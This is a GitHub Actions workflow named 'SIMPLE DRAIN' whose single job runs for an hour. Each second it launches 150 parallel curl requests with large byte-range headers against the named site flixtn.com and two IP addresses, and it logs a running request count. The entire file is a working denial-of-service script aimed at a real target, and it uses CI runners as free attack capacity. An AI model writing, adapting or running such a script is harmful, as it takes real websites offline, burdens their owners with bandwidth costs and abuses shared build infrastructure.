name: 🔥 SIMPLE DRAIN

on:
  workflow_dispatch:

jobs:
  drain:
    runs-on: ubuntu-latest
    timeout-minutes: 65
    
    steps:
      - name: Install curl
        run: sudo apt update && sudo apt install -y curl
        
      - name: 🔥 DRAIN START
        run: |
          echo "STARTING DRAIN - 60 MINUTES"
          echo "Target: flixtn.com"
          echo ""
          
          END=$((SECONDS + 3600))
          COUNT=0
          
          while [ $SECONDS -lt $END ]; do
            # طلبات متعددة
            for i in {1..50}; do
              curl -s -o /dev/null "https://flixtn.com/" -H "Range: bytes=0-500000" --max-time 2 &
              curl -s -o /dev/null "https://64.29.17.65/" -H "Range: bytes=0-500000" --max-time 2 &
              curl -s -o /dev/null "https://216.198.79.65/" -H "Range: bytes=0-500000" --max-time 2 &
            done
            
            COUNT=$((COUNT + 150))
            
            # اطبع كل ثانية
            echo "SECOND $((SECONDS)): $COUNT requests sent"
            
            sleep 1
          done
          
          echo ""
          echo "DRAIN COMPLETE"
          echo "Total requests: $COUNT"
